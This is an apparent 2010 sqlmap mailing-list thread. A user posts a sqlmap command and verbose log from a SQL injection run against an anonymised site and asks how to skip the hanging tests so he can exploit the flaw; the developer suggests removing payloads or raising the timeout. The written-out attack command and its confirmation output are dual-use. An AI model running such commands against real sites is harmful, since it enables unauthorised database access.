Re: [sqlmap-users] Some way to cancel others tests?
From: Bernardo D. A. G. <ber...@gm...> - 2010-12-02 15:55:58
You can either remove tests from x/payloads.XML or I would suggest setting --timeout to an appropriate value; maybe 60 or 120 will do in your case.

Bernardo Damele A. G.
This message was sent from a smartphone

On 1 Dec 2010, at 19:36, David Guimaraes <sk...@gm...> wrote:

Is there any way to make sqlmap not conduct further tests on the site? (stacked, error, time-based, etc.). The problem is that during the identification of types of sqli allowed, it hangs on a test and terminates the program without allowing me to exploit the flaw.

Example:

Revision: 2468

$ ./sqlmap.py -u "http://www.vuln.xxx.br/path/vulnphp.php?vulnparam=1766" -p vulnparam --threads 20 --dbs -v 2

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 17:23:43

[17:23:43] [DEBUG] cleaning up configuration parameters
[17:23:43] [DEBUG] setting the HTTP timeout
[17:23:43] [DEBUG] setting the HTTP method to GET
[17:23:43] [DEBUG] setting the UNION query SQL injection range of columns
[17:23:43] [DEBUG] creating HTTP requests opener object
[17:23:43] [INFO] using '/home/xxx/sqlmap-dev/output/www.vuln.xxx.br/session' as session file
[17:23:43] [INFO] testing connection to the target url
[17:23:44] [WARNING] the testable parameter 'vulnparam' you provided is not into the Cookie
[17:23:44] [INFO] testing if the url is stable, wait a few seconds
[17:23:46] [INFO] url is stable
[17:23:49] [INFO] heuristics shows that GET parameter 'vulnparam' might be injectable (possible DBMS: MySQL)
[17:23:49] [INFO] testing sql injection on GET parameter 'vulnparam'
[17:23:49] [INFO] testing 'AND boolean-based blind - WHERE clause'
sqlmap got a 302 redirect to /home/l.php - What target address do you want to use from now on? http://www.vuln.xxx.br:80/path/vulnphp.php (default) or provide another target address based also on the redirection got from the application
>
[17:23:52] [DEBUG] setting match ratio for current parameter to default value 0.900
[17:23:58] [INFO] GET parameter 'vulnparam' is 'AND boolean-based blind - WHERE clause' injectable
[17:23:58] [DEBUG] skipping test 'OR boolean-based blind - WHERE clause' because the risk is higher than the provided
[17:23:58] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided
[17:23:58] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided
[17:23:58] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause' because the level is higher than the provided
[17:23:58] [DEBUG] skipping test 'Oracle boolean-based blind - ORDER BY clause' because the level is higher than the provided
[17:23:58] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided
[17:23:58] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided
[17:23:58] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided
[17:23:58] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause' because the level is higher than the provided
[17:23:58] [DEBUG] skipping test 'Oracle boolean-based blind - ORDER BY clause' because the level is higher than the provided
[17:23:58] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided
[17:23:58] [INFO] testing 'MySQL >= 5.0 error-based - WHERE clause'
[17:23:59] [INFO] GET parameter 'vulnparam' is 'MySQL >= 5.0 error-based - WHERE clause' injectable
[17:24:00] [DEBUG] skipping test 'PostgreSQL error-based - WHERE clause' because the back-end DBMS identified is MySQL
[17:24:00] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - WHERE clause' because the back-end DBMS identified is MySQL
[17:24:00] [DEBUG] skipping test 'Oracle error-based - WHERE clause' because the back-end DBMS identified is MySQL
[17:24:00] [DEBUG] skipping test 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'PostgreSQL error-based - GROUP BY and ORDER BY clauses' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - ORDER BY clause' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'Oracle error-based - ORDER BY clause' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'PostgreSQL error-based - GROUP BY and ORDER BY clauses' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - ORDER BY clause' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'Oracle error-based - ORDER BY clause' because the level is higher than the provided
[17:24:00] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:24:00] [DEBUG] skipping test 'MySQL < 5.0.12 stacked queries' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'PostgreSQL > 8.1 stacked queries' because the back-end DBMS identified is MySQL
[17:24:00] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries - exists function' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries - Glibc' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked queries' because the back-end DBMS identified is MySQL
[17:24:00] [DEBUG] skipping test 'Oracle stacked queries' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'Oracle stacked queries' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'Oracle stacked queries' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'SQLite > 2.0 stacked queries' because the level is higher than the provided
[17:24:00] [DEBUG] skipping test 'Firebird stacked queries' because the level is higher than the provided
[17:24:00] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[17:24:40] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[17:25:11] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[17:25:42] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[17:26:13] [CRITICAL] unable to connect to the target url or proxy

[*] shutting down at: 17:26:13

David